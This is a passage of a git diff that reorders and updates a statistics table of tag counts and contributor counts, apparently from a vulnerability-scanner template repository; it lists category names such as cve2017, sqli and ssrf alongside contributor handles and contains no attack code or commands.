.pre-commit-config.yaml | 1 | | | | | | default-login | 50 | techbrunchfr | 13 | | | | | | | -| iot | 43 | suman_kar | 12 | | | | | | | -| cve2017 | 43 | cyllective | 11 | | | | | | | +| cve2017 | 43 | suman_kar | 12 | | | | | | | +| iot | 43 | cyllective | 11 | | | | | | | | file | 42 | random_robbie | 10 | | | | | | | -| unauth | 40 | righettod | 9 | | | | | | | -| network | 35 | wdahlenb | 9 | | | | | | | -| sqli | 34 | hackergautam | 8 | | | | | | | -| oob | 32 | nadino | 8 | | | | | | | -| logs | 29 | aashiq | 8 | | | | | | | -| oracle | 29 | iamthefrogy | 8 | | | | | | | -| workflow | 29 | melbadry9 | 8 | | | | | | | -| ssrf | 27 | that_juan_ | 8 | | | | | | | -| misc | 27 | randomstr1ng | 7 | | | | | | | -| jira | 26 | dr_set | 7 | | | | | | | -| atlassian | 26 | emadshanab | 7 | | | | | | | -| disclosure | 25 | 0x240x23elu | 7 | | | | | | | -| cve2016 | 23 | oppsec | 7 | | | | | | | -| listing | 22 | harshbothra_ | 7 | | | | | | | -| redirect | 20 | techryptic (@tech) | 7 | | | | | | | -| aem | 19 | kophjager007 | 7 | | | | | | | -| cisco | 17 | r3dg33k | 7 | | | | | | | +| unauth | 40 | wdahlenb | 9 | | | | | | | +| network | 35 | righettod | 9 | | | | | | | +| sqli | 34 | aashiq | 8 | | | | | | | +| oob | 33 | hackergautam | 8 | | | | | | | +| oracle | 29 | melbadry9 | 8 | | | | | | | +| logs | 29 | iamthefrogy | 8 | | | | | | | +| workflow | 29 | that_juan_ | 8 | | | | | | | +| misc | 27 | nadino | 8 | | | | | | | +| ssrf | 27 | emadshanab | 7 | | | | | | | +| jira | 26 | harshbothra_ | 7 | | | | | | | +| atlassian | 26 | kophjager007 | 7 | | | | | | | +| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | +| cve2016 | 23 | 0x240x23elu | 7 | | | | | | | +| listing | 22 | r3dg33k | 7 | | | | | | | +| redirect | 20 | randomstr1ng | 7 | | | | | | | +| aem | 19 | oppsec | 7 | | | | | | | +| cisco | 17 | dr_set | 7 | | | | | | | | sap | 16 | puzzlepeaches | 6 | | | | | | | -| debug | 14 | caspergn | 6 | | | | | | | -| misconfig | 13 | __fazal | 6 | | | | | | | -| struts | 13 | yanyun | 5 | | | | | | | -| fuzz | 13 | joanbono | 5 | | | | | | | +| debug | 14 | __fazal | 6 | | | | | | | +| fuzz | 13 | caspergn | 6 | | | | | | | +| misconfig | 13 | pentest_swissky | 5 | | | | | | | | cve2015 | 13 | panch0r3d | 5 | | | | | | | -| adobe | 12 | ganofins | 5 | | | | | | | -| auth-bypass | 12 | pentest_swissky | 5 | | | | | | | -| weblogic | 12 | meme-lord | 4 | | | | | | | -| android | 12 | iamnoooob | 4 | | | | | | | -| dns | 11 | xelkomy | 4 | | | | | | | -| cve2012 | 11 | nodauf | 4 | | | | | | | -| zoho | 11 | elsfa7110 | 4 | | | | | | | -| springboot | 11 | github.com/its0x08 | 4 | | | | | | | -| cve2011 | 11 | rootxharsh | 4 | | | | | | | -| cve2014 | 10 | e_schultze_ | 4 | | | | | | | -| devops | 10 | impramodsargar | 3 | | | | | | | -| jenkins | 10 | z3bd | 3 | | | | | | | -| cve2013 | 10 | mavericknerd | 3 | | | | | | | -| php | 10 | binaryfigments | 3 | | | | | | | -| dlink | 10 | tess | 3 | | | | | | | -| magento | 9 | dudez | 3 | | | | | | | -| gitlab | 8 | shine | 3 | | | | | | | -| ftp | 8 | yash anand @yashanand155 | 3 | | | | | | | -| rails | 8 | fyoorer | 3 | | | | | | | -| aws | 8 | f1tz | 3 | | | | | | | -| airflow | 8 | thomas_from_offensity | 3 | | | | | | | -| cnvd | 8 | _generic_human_ | 3 | | | | | | | -| router | 8 | jarijaas | 3 | | | | | | | -| joomla | 7 | 0w4ys | 3 | | | | | | | -| nginx | 7 | ree4pwn | 2 | | | | | | | -| scada | 7 | joeldeleep | 2 | | | | | | | -| xxe | 7 | 0xsapra | 2 | | | | | | | -| vmware | 7 | incogbyte | 2 | | | | | | | -| coldfusion | 6 | x1m_martijn | 2 | | | | | | | -| jetty | 6 | vavkamil | 2 | | | | | | | -| rconfig | 6 | dheerajmadhukar | 2 | | | | | | | -| google | 6 | amsda | 2 | | | | | | | -| backup | 6 | fabaff | 2 | | | | | | | -| citrix | 6 | 0xrudra | 2 | | | | | | | -| api | 6 | 0xcrypto | 2 | | | | | | | -| cms | 6 | hetroublemakr | 2 | | | | | | | -| lucee | 5 | koti2 | 2 | | | | | | | -| java | 5 | 0xelkomy | 2 | | | | | | | -| dedecms | 5 | davidmckennirey | 2 | | | | | | | -| ruijie | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| drupal | 5 | bp0lr | 2 | | | | | | | -| django | 5 | udit_thakkur | 2 | | | | | | | -| dell | 5 | nkxxkn | 2 | | | | | | | -| circarlife | 5 | bing0o | 2 | | | | | | | -| ibm | 5 | bsysop | 2 | | | | | | | -| ssti | 5 | ehsahil | 2 | | | | | | | -| confluence | 5 | gevakun | 2 | | | | | | | -| cve2009 | 5 | lotusdll | 2 | | | | | | | -| netgear | 5 | lu4nx | 2 | | | | | | | -| login | 5 | random-robbie | 2 | | | | | | | -| headless | 5 | randomrobbie | 2 | | | | | | | -| laravel | 5 | manas_harsh | 2 | | | | | | | -| solr | 5 | moritz nentwig | 2 | | | | | | | -| iis | 5 | unstabl3 | 2 | | | | | | | -| phpmyadmin | 5 | afaq | 2 | | | | | | | -| files | 5 | pxmme1337 | 2 | | | | | | | -| thinkphp | 4 | 0xprial | 2 | | | | | | | -| hongdian | 4 | emenalf | 2 | | | | | | | -| solarwinds | 4 | zomsop82 | 2 | | | | | | | -| magmi | 4 | shifacyclewala | 2 | | | | | | | -| tomcat | 4 | w4cky_ | 2 | | | | | | | -| samsung | 4 | foulenzer | 2 | | | | | | | -| jolokia | 4 | swissky | 2 | | | | | | | -| webserver | 4 | kiblyn11 | 2 | | | | | | | -| elastic | 4 | thevillagehacker | 1 | | | | | | | -| traversal | 4 | bernardo rodrigues | 1 | | | | | | | +| struts | 13 | ganofins | 5 | | | | | | | +| adobe | 12 | yanyun | 5 | | | | | | | +| android | 12 | joanbono | 5 | | | | | | | +| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | +| auth-bypass | 12 | elsfa7110 | 4 | | | | | | | +| cve2011 | 11 | e_schultze_ | 4 | | | | | | | +| cve2012 | 11 | rootxharsh | 4 | | | | | | | +| dns | 11 | meme-lord | 4 | | | | | | | +| zoho | 11 | nodauf | 4 | | | | | | | +| springboot | 11 | xelkomy | 4 | | | | | | | +| php | 10 | iamnoooob | 4 | | | | | | | +| cve2013 | 10 | 0w4ys | 3 | | | | | | | +| dlink | 10 | z3bd | 3 | | | | | | | +| devops | 10 | fyoorer | 3 | | | | | | | +| cve2014 | 10 | impramodsargar | 3 | | | | | | | +| jenkins | 10 | yash anand @yashanand155 | 3 | | | | | | | +| magento | 9 | binaryfigments | 3 | | | | | | | +| router | 8 | _generic_human_ | 3 | | | | | | | +| ftp | 8 | f1tz | 3 | | | | | | | +| gitlab | 8 | dudez | 3 | | | | | | | +| aws | 8 | jarijaas | 3 | | | | | | | +| airflow | 8 | tess | 3 | | | | | | | +| rails | 8 | shine | 3 | | | | | | | +| cnvd | 8 | thomas_from_offensity | 3 | | | | | | | +| joomla | 7 | mavericknerd | 3 | | | | | | | +| scada | 7 | manas_harsh | 2 | | | | | | | +| nginx | 7 | 0xprial | 2 | | | | | | | +| vmware | 7 | bing0o | 2 | | | | | | | +| xxe | 7 | 0xcrypto | 2 | | | | | | | +| cms | 6 | bp0lr | 2 | | | | | | | +| citrix | 6 | amsda | 2 | | | | | | | +| rconfig | 6 | 0xrudra | 2 | | | | | | | +| jetty | 6 | random-robbie | 2 | | | | | | | +| google | 6 | vavkamil | 2 | | | | | | | +| api | 6 | pxmme1337 | 2 | | | | | | | +| coldfusion | 6 | dheerajmadhukar | 2 | | | | | | | +| backup | 6 | lotusdll | 2 | | | | | | | +| java | 5 | fabaff | 2 | | | | | | | +| confluence | 5 | joeldeleep | 2 | | | | | | | +| ssti | 5 | gevakun | 2 | | | | | | | +| files | 5 | koti2 | 2 | | | | | | | +| cve2009 | 5 | unstabl3 | 2 | | | | | | | +| headless | 5 | shifacyclewala | 2 | | | | | | | +| dell | 5 | moritz nentwig | 2 | | | | | | | +| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | +| ruijie | 5 | nkxxkn | 2 | | | | | | | +| login | 5 | emenalf | 2 | | | | | | | +| django | 5 | hetroublemakr | 2 | | | | | | | +| iis | 5 | bsysop | 2 | | | | | | | +| solr | 5 | zomsop82 | 2 | | | | | | | +| drupal | 5 | afaq | 2 | | | | | | | +| netgear | 5 | randomrobbie | 2 | | | | | | | +| dedecms | 5 | 0xelkomy | 2 | | | | | | | +| laravel | 5 | ree4pwn | 2 | | | | | | | +| circarlife | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| ibm | 5 | davidmckennirey | 2 | | | | | | | +| lucee | 5 | incogbyte | 2 | | | | | | | +| webserver | 4 | lu4nx | 2 | | | | | | | +| thinkcmf | 4 | w4cky_ | 2 | | | | | | | +| artifactory | 4 | 0xsapra | 2 | | | | | | | +| tomcat | 4 | udit_thakkur | 2 | | | | | | | +| nodejs | 4 | swissky | 2 | | | | | | | +| vpn | 4 | x1m_martijn | 2 | | | | | | | +| moodle | 4 | foulenzer | 2 | | | | | | | +| traversal | 4 | ehsahil | 2 | | | | | | | +| thinkphp | 4 | soyelmago | 1 | | | | | | | +| hongdian | 4 | ajaysenr | 1 | | | | | | | +| asp | 4 | absshax | 1 | | | | | | | +| docker | 4 | andysvints | 1 | | | | | | | +| solarwinds | 4 | alph4byt3 | 1 | | | | | | | +| elastic | 4 | _c0wb0y_ | 1 | | | | | | | +| jolokia | 4 | bjhulst | 1 | | | | | | | +| crlf | 4 | geraldino2 | 1 | | | | | | | +| samsung | 4 | pudsec | 1 | | | | | | | +| fileupload | 4 | yashgoti | 1 | | | | | | | +| magmi | 4 | notsoevilweasel | 1 | | | | | | | +| ebs | 3 | shifacyclewla | 1 | | | | | | | +| resin | 3 | kurohost | 1 | | | | | | | +| lfr | 3 | whynotke | 1 | | | | | | | +| caucho | 3 | rtcms | 1 | | | | | | | +| microstrategy | 3 | zhenwarx | 1 | | | | | | | +| targa | 3 | shelld3v | 1 | | | | | | | +| mongodb | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| fpd | 3 | johnk3r | 1 | | | | | | | +| slack | 3 | b0yd | 1 | | | | | | | +| r-seenet | 3 | daviey | 1 | | | | | | | +| cve2010 | 3 | ipanda | 1 | | | | | | | +| springcloud | 3 | petruknisme | 1 | | | | | | | +| hp | 3 | streetofhackerr007 | 1 | | | | | | | +| vbulletin | 3 | alperenkesk | 1 | | | | | | | +| fanruan | 3 | sshell | 1 | | | | | | | +| windows | 3 | alex | 1 | | | | | | | +| amazon | 3 | furkansenan | 1 | | | | | | | +| openssh | 3 | yashanand155 | 1 | | | | | | | +| bypass | 3 | sickwell | 1 | | | | | | | +| nosqli | 3 | th3.d1p4k | 1 | | | | | | | +| kafka | 3 | defr0ggy | 1 | | | | | | | +| ofbiz | 3 | co0nan | 1 | | | | | | | +| ssh | 3 | raesene | 1 | | | | | | | +| printer | 3 | 0h1in9e | 1 | | | | | | | +| grafana | 3 | dogasantos | 1 | | | | | | | +| backups | 3 | aceseven (digisec360) | 1 | | | | | | | +| deserialization | 3 | affix | 1 | | | | | | | +| terramaster | 3 | juicypotato1 | 1 | | | | | | | +| git | 3 | jteles | 1 | | | | | | | +| log | 3 | ringo | 1 | | | | | | | +| nacos | 3 | akash.c | 1 | | | | | | | +| oa | 3 | bolli95 | 1 | | | | | | | +| kubernetes | 3 | rojanrijal | 1 | | | | | | | +| intrusive | 2 | s1r1u5_ | 1 | | | | | | | +| openfire | 2 | _harleo | 1 | | | | | | | +| spark | 2 | omarkurt | 1 | | | | | | | +| chamilo | 2 | 52971 | 1 | | | | | | | +| splunk | 2 | arcc | 1 | | | | | | | +| hpe | 2 | mubassirpatel | 1 | | | | | | | +| hashicorp | 2 | deena | 1 | | | | | | | +| chiyu | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| paloalto | 2 | 0xrod | 1 | | | | | | | +| rstudio | 2 | idealphase | 1 | | | | | | | +| maian | 2 | schniggie | 1 | | | | | | | +| rockmongo | 2 | 0xteles | 1 | | | | | | | +| cache | 2 | kabirsuda | 1 | | | | | | | +| service | 2 | toufik airane | 1 | | | | | | | +| cve2008 | 2 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| sharepoint | 2 | berkdusunur | 1 | | | | | | | +| telerik | 2 | _darrenmartyn | 1 | | | | | | | +| icewarp | 2 | elmahdi | 1 | | | | | | | +| trixbox | 2 | ooooooo_q | 1 | | | | | | | +| strapi | 2 | knassar702 | 1 | | | | | | | +| kentico | 2 | sy3omda | 1 | | | | | | | +| waf | 2 | ilovebinbash | 1 | | | | | | | +| frp | 2 | remonsec | 1 | | | | | | | +| activemq | 2 | retr0 | 1 | | | | | | | +| couchdb | 2 | noamrathaus | 1 | | | | | | | +| dos | 2 | regala_ | 1 | | | | | | | +| yapi | 2 | yavolo | 1 | | | | | | | +| zabbix | 2 | micha3lb3n | 1 | | | | | | | +| mida | 2 | undefl0w | 1 | | | | | | | +| mail | 2 | ldionmarcil | 1 | | | | | | | +| cve2007 | 2 | @dwisiswant0 | 1 | | | | | | | +| igs | 2 | d0rkerdevil | 1 | | | | | | | +| wordfence | 2 | b4uh0lz | 1 | | | | | | | +| odoo | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| seeyon | 2 | un-fmunozs | 1 | | | | | | | +| ucmdb | 2 | its0x08 | 1 | | | | | | | +| hjtcloud | 2 | divya_mudgal | 1 | | | | | | | +| bigip | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| leak | 2 | cookiehanhoan | 1 | | | | | | | +| httpd | 2 | mohammedsaneem | 1 | | | | | | | +| zhiyuan | 2 | tim_koopmans | 1 | | | | | | | +| sonicwall | 2 | gal nagli | 1 | | | | | | | +| keycloak | 2 | alifathi-h1 | 1 | | | | | | | +| fortios | 2 | kba@sogeti_esec | 1 | | | | | | | +| rockethchat | 2 | tirtha_mandal | 1 | | | | | | | +| oauth | 2 | flag007 | 1 | | | | | | | +| glassfish | 2 | pdp | 1 | | | | | | | +| kibana | 2 | gboddin | 1 | | | | | | | +| jellyfin | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| idrac | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| sonarqube | 2 | c3l3si4n | 1 | | | | | | | +| ecology | 2 | smaranchand | 1 | | | | | | | +| jboss | 2 | mhdsamx | 1 | | | | | | | +| saltstack | 2 | fopina | 1 | | | | | | | +| globalprotect | 2 | sicksec | 1 | | | | | | | +| pega | 2 | willd96 | 1 | | | | | | | +| xxljob | 2 | zandros0 | 1 | | | | | | | +| nextjs | 2 | 0ut0fb4nd | 1 | | | | | | | +| flir | 2 | ahmed sherif | 1 | | | | | | | +| bitrix | 2 | bernardofsr | 1 | | | | | | | +| prometheus | 2 | taielab | 1 | | | | | | | +| huawei | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| webcam | 2 | wabafet | 1 | | | | | | | +| kevinlab | 2 | hanlaomo | 1 | | | | | | | +| voipmonitor | 2 | akshansh | 1 | | | | | | | +| plesk | 2 | shreyapohekar | 1 | | | | | | | +| natshell | 2 | ohlinge | 1 | | | | | | | +| nexus | 2 | manuelbua | 1 | | | | | | | +| showdoc | 2 | mah3sec_ | 1 | | | | | | | +| shellshock | 2 | qlkwej | 1 | | | | | | | +| nagios | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| vpn | 4 | sshell | 1 | | | | | | | -| artifactory | 4 | gal nagli | 1 | | | | | | | -| fileupload | 4 | mubassirpatel | 1 | | | | | | | -| nodejs | 4 | furkansenan | 1 | | | | | | | -| moodle | 4 | un-fmunozs | 1 | | | | | | | -| crlf | 4 | thezakman | 1 | | | | | | | -| asp | 4 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| docker | 4 | j33n1k4 | 1 | | | | | | | -| thinkcmf | 4 | kareemse1im | 1 | | | | | | | -| grafana | 3 | divya_mudgal | 1 | | | | | | | -| springcloud | 3 | 0xrod | 1 | | | | | | | -| slack | 3 | naglinagli | 1 | | | | | | | -| microstrategy | 3 | @dwisiswant0 | 1 | | | | | | | -| nacos | 3 | _darrenmartyn | 1 | | | | | | | -| ofbiz | 3 | johnjhacking | 1 | | | | | | | -| windows | 3 | bad5ect0r | 1 | | | | | | | -| nosqli | 3 | regala_ | 1 | | | | | | | -| backups | 3 | geraldino2 | 1 | | | | | | | -| fpd | 3 | smaranchand | 1 | | | | | | | -| kubernetes | 3 | wabafet | 1 | | | | | | | -| hp | 3 | gboddin | 1 | | | | | | | -| ebs | 3 | makyotox | 1 | | | | | | | -| targa | 3 | chron0x | 1 | | | | | | | -| ssh | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| vbulletin | 3 | akash.c | 1 | | | | | | | -| oa | 3 | fmunozs | 1 | | | | | | | -| r-seenet | 3 | daviey | 1 | | | | | | | -| amazon | 3 | blckraven | 1 | | | | | | | -| resin | 3 | alex | 1 | | | | | | | -| caucho | 3 | knassar702 | 1 | | | | | | | -| cve2010 | 3 | remonsec | 1 | | | | | | | -| mongodb | 3 | noamrathaus | 1 | | | | | | | -| fanruan | 3 | soyelmago | 1 | | | | | | | -| deserialization | 3 | shreyapohekar | 1 | | | | | | | -| log | 3 | ohlinge | 1 | | | | | | | -| git | 3 | cookiehanhoan | 1 | | | | | | | -| openssh | 3 | retr0 | 1 | | | | | | | -| terramaster | 3 | 0xtavian | 1 | | | | | | | -| bypass | 3 | bolli95 | 1 | | | | | | | -| kafka | 3 | ldionmarcil | 1 | | | | | | | -| lfr | 3 | fopina | 1 | | | | | | | -| printer | 3 | jeya seelan | 1 | | | | | | | -| frp | 2 | nytr0gen | 1 | | | | | | | -| jboss | 2 | rtcms | 1 | | | | | | | -| ucmdb | 2 | elmahdi | 1 | | | | | | | -| webcam | 2 | defr0ggy | 1 | | | | | | | -| plesk | 2 | c3l3si4n | 1 | | | | | | | -| microsoft | 2 | vsh00t | 1 | | | | | | | -| proxy | 2 | exploitation | 1 | | | | | | | -| trixbox | 2 | andysvints | 1 | | | | | | | -| paloalto | 2 | 52971 | 1 | | | | | | | -| xxljob | 2 | mah3sec_ | 1 | | | | | | | -| keycloak | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| smb | 2 | sickwell | 1 | | | | | | | -| linkerd | 2 | dawid czarnecki | 1 | | | | | | | -| natshell | 2 | affix | 1 | | | | | | | -| jellyfin | 2 | yashanand155 | 1 | | | | | | | -| globalprotect | 2 | mhdsamx | 1 | | | | | | | -| httpd | 2 | whynotke | 1 | | | | | | | -| hjtcloud | 2 | bjhulst | 1 | | | | | | | -| sonarqube | 2 | d0rkerdevil | 1 | | | | | | | -| cache | 2 | raesene | 1 | | | | | | | -| showdoc | 2 | undefl0w | 1 | | | | | | | -| vrealize | 2 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| dos | 2 | ipanda | 1 | | | | | | | -| kibana | 2 | co0nan | 1 | | | | | | | -| mida | 2 | patralos | 1 | | | | | | | -| oauth | 2 | sicksec | 1 | | | | | | | -| fortios | 2 | hakluke | 1 | | | | | | | -| rstudio | 2 | luci | 1 | | | | | | | -| strapi | 2 | ahmed sherif | 1 | | | | | | | -| cve2008 | 2 | streetofhackerr007 | 1 | | | | | | | -| shellshock | 2 | rojanrijal | 1 | | | | | | | -| openfire | 2 | 0ut0fb4nd | 1 | | | | | | | -| intrusive | 2 | alph4byt3 | 1 | | | | | | | -| kentico | 2 | b0yd | 1 | | | | | | | -| emerge | 2 | hanlaomo | 1 | | | | | | | -| kevinlab | 2 | revblock | 1 | | | | | | | -| hpe | 2 | sullo | 1 | | | | | | | -| mail | 2 | andirrahmani1 | 1 | | | | | | | -| ecology | 2 | sy3omda | 1 | | | | | | | -| yapi | 2 | kabirsuda | 1 | | | | | | | -| idrac | 2 | alifathi-h1 | 1 | | | | | | | -| splunk | 2 | idealphase | 1 | | | | | | | -| cve2007 | 2 | kba@sogeti_esec | 1 | | | | | | | -| rockmongo | 2 | deena | 1 | | | | | | | -| openam | 2 | taielab | 1 | | | | | | | -| zhiyuan | 2 | alperenkesk | 1 | | | | | | | -| seeyon | 2 | micha3lb3n | 1 | | | | | | | -| wordfence | 2 | shelld3v | 1 | | | | | | | -| smtp | 2 | becivells | 1 | | | | | | | -| odoo | 2 | s1r1u5_ | 1 | | | | | | | -| service | 2 | toufik airane | 1 | | | | | | | -| waf | 2 | luskabol | 1 | | | | | | | -| nagios | 2 | arcc | 1 | | | | | | | -| rockethchat | 2 | schniggie | 1 | | | | | | | -| zabbix | 2 | th3.d1p4k | 1 | | | | | | | -| chiyu | 2 | 0xteles | 1 | | | | | | | -| couchdb | 2 | _harleo | 1 | | | | | | | -| prometheus | 2 | pdp | 1 | | | | | | | -| injection | 2 | kurohost | 1 | | | | | | | -| telerik | 2 | notsoevilweasel | 1 | | | | | | | -| chamilo | 2 | ringo | 1 | | | | | | | -| nexus | 2 | pudsec | 1 | | | | | | | -| bigip | 2 | omarkurt | 1 | | | | | | | -| huawei | 2 | flag007 | 1 | | | | | | | -| glassfish | 2 | dogasantos | 1 | | | | | | | -| leak | 2 | vzamanillo | 1 | | | | | | | -| voipmonitor | 2 | yavolo | 1 | | | | | | | -| bitrix | 2 | @github.com/defr0ggy | 1 | | | | | | | -| pega | 2 | juicypotato1 | 1 | | | | | | | -| igs | 2 | ilovebinbash | 1 | | | | | | | -| maian | 2 | iampritam | 1 | | | | | | | -| spark | 2 | abison_binoy | 1 | | | | | | | -| hashicorp | 2 | 0h1in9e | 1 | | | | | | | -| saltstack | 2 | apt-mirror | 1 | | | | | | | -| icewarp | 2 | yashgoti | 1 | | | | | | | -| activemq | 2 | willd96 | 1 | | | | | | | -| sonicwall | 2 | absshax | 1 | | | | | | | -| sharepoint | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| smtp | 2 | andirrahmani1 | 1 | | | | | | | +| smb | 2 | aresx | 1 | | | | | | | +| vrealize | 2 | naglinagli | 1 | | | | | | | +| linkerd | 2 | chron0x | 1 | | | | | | | +| injection | 2 | bad5ect0r | 1 | | | | | | | +| openam | 2 | blckraven | 1 | | | | | | | +| proxy | 2 | thezakman | 1 | | | | | | | +| microsoft | 2 | johnjhacking | 1 | | | | | | | +| emerge | 2 | @github.com/defr0ggy | 1 | | | | | | | +| openstack | 1 | j33n1k4 | 1 | | | | | | | +| mdb | 1 | r3naissance | 1 | | | | | | | +| tensorboard | 1 | becivells | 1 | | | | | | | +| rujjie | 1 | fmunozs | 1 | | | | | | | +| dvwa | 1 | ratnadip gajbhiye | 1 | | | | | | | +| sprintful | 1 | dawid czarnecki | 1 | | | | | | | +| synnefo | 1 | patralos | 1 | | | | | | | +| hiboss | 1 | sullo | 1 | | | | | | | +| opensmtpd | 1 | luci | 1 | | | | | | | +| memcached | 1 | rodnt | 1 | | | | | | | +| biometrics | 1 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| nextjs | 2 | tirtha_mandal | 1 | | | | | | | -| redcap | 1 | _c0wb0y_ | 1 | | | | | | | -| mantis | 1 | r3naissance | 1 | | | | | | | -| npm | 1 | aceseven (digisec360) | 1 | | | | | | | -| anchorcms | 1 | j3ssie/geraldino2 | 1 | | | | | | | -| k8s | 1 | bernardofsr | 1 | | | | | | | -| shopxo | 1 | johnk3r | 1 | | | | | | | -| alibaba | 1 | rodnt | 1 | | | | | | | -| axis | 1 | akshansh | 1 | | | | | | | -| jsf | 1 | jteles | 1 | | | | | | | -| servicenow | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| expn | 1 | ratnadip gajbhiye | 1 | | | | | | | -| sco | 1 | its0x08 | 1 | | | | | | | -| h3c-imc | 1 | mohammedsaneem | 1 | | | | | | | -| powercreator | 1 | shifacyclewla | 1 | | | | | | | -| haproxy | 1 | aresx | 1 | | | | | | | -| gateone | 1 | ooooooo_q | 1 | | | | | | | -| plugin | 1 | zandros0 | 1 | | | | | | | -| duomicms | 1 | ajaysenr | 1 | | | | | | | -| addpac | 1 | berkdusunur | 1 | | | | | | | -| blind | 1 | qlkwej | 1 | | | | | | | -| netsweeper | 1 | petruknisme | 1 | | | | | | | -| javamelody | 1 | tim_koopmans | 1 | | | | | | | -| wiki | 1 | manuelbua | 1 | | | | | | | -| faraday | 1 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| ec2 | 1 | zhenwarx | 1 | | | | | | | -| mongoshake | 1 | b4uh0lz | 1 | | | | | | | -| xiuno | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | +| myucms | 1 | kareemse1im | 1 | | | | | | | +| ruckus | 1 | vzamanillo | 1 | | | | | | | +| webmin | 1 | 0xtavian | 1 | | | | | | | +| landray | 1 | thevillagehacker | 1 | | | | | | | +| monitorix | 1 | luskabol | 1 | | | | | | | +| erp-nc | 1 | apt-mirror | 1 | | | | | | | +| zmanda | 1 | nytr0gen | 1 | | | | | | | +| acme | 1 | makyotox | 1 | | | | | | | +| redhat | 1 | abison_binoy | 1 | | | | | | | +| phpunit | 1 | vsh00t | 1 | | | | | | | +| apos | 1 | exploitation | 1 | | | | | | | +| shopxo | 1 | iampritam | 1 | | | | | | | +| wildfly | 1 | revblock | 1 | | | | | | | +| fastapi | 1 | jeya seelan | 1 | | | | | | | +| vnc | 1 | hakluke | 1 | | | | | | | +| diris | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | | rfi | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | | ntopng | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| azure | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | | htmli | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| robomongo | 1 | | | 